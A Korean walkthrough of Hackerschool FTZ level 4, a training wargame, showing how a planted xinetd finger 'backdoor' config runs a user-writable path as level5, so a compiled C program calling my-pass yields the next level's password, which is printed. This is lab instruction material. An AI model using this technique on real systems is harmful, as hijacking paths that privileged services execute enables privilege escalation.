해커스쿨 FTZ [LEVEL4] 풀이

해커스쿨 FTZ [LEVEL4] 풀이

---

M4ndU

---

해커스쿨 FTZ [LEVEL4] 풀이입니다.

ID | level4

PW | suck my brain

으로 로그인합니다.

$ ls -l

를 이용해  어떤 파일과 어떤 폴더가 있는지 확인해 봅시다.

---

login as: level4

level4@192.168.31.128's password:

[level4@ftz level4]$ ls -l

total 12

-rw-r--r--    1 root     root           50 Feb 24  2002 hint

drwxr-xr-x    2 root     level4       4096 Feb 24  2002 public_html

drwxrwxr-x    2 root     level4       4096 Feb  6 22:17 tmp

hint 파일이 있습니다.

cat 명령어를 통해 hint 파일의 내용을 확인해 봅시다.

[level4@ftz level4]$ cat hint

누군가 /etc/xinetd.d/에 백도어를 심어놓았다.!

일단 /etc/xinetd.d/로 이동을 해야겠네요.

[level4@ftz level4]$ cd /etc/xinetd.d/

[level4@ftz xinetd.d]$ ls -l backdoor

-r--r--r--    1 root     level4        171 Sep 10  2011 backdoor

정말 백도어가 있네요.

cat 명령어를 통해 백도어를 봅시다.

[level4@ftz xinetd.d]$ cat ./backdoor

service finger

{

        disable = no

        flags           = REUSE

        socket_type     = stream

        wait            = no

        user            = level5

        server          = /home/level4/tmp/backdoor

        log_on_failure  += USERID

}

finger 서비스로 실행되는 백도어이며,

level5의 권한으로 /home/level4/tmp/backdoor 을 실행시키는 것 같습니다.

해당 경로로 이동해서 확인해 봅시다.

[level4@ftz xinetd.d]$ cd /home/level4/tmp

[level4@ftz tmp]$ ls -l

total 0

아무것도 없네요..

그럼 우리가 직접 my-pass를 실행하는 파일을 만들어야 할 것 같습니다.

[level4@ftz tmp]$ vi backdoor.c

#include <stdio.h>

#include <stdlib.h>

int main(void){

        system("my-pass");

}

~

~

i를 눌러 삽입모드 에서 작성하시고 esc를 눌러 명령모드에서 :wq를 입력하면 저장됩니다.

[level4@ftz tmp]$ gcc -o backdoor backdoor.c

backdoor라는 이름으로 컴파일을 합니다.

이제 finger 서비스를 시작합니다.

[level4@ftz tmp]$ finger @localhost

^[[H^[[J

Level5 Password is "what is your name?".

다음 레벨로 가즈아ㅏㅏㅏㅏㅏㅏㅏㅏㅏㅏ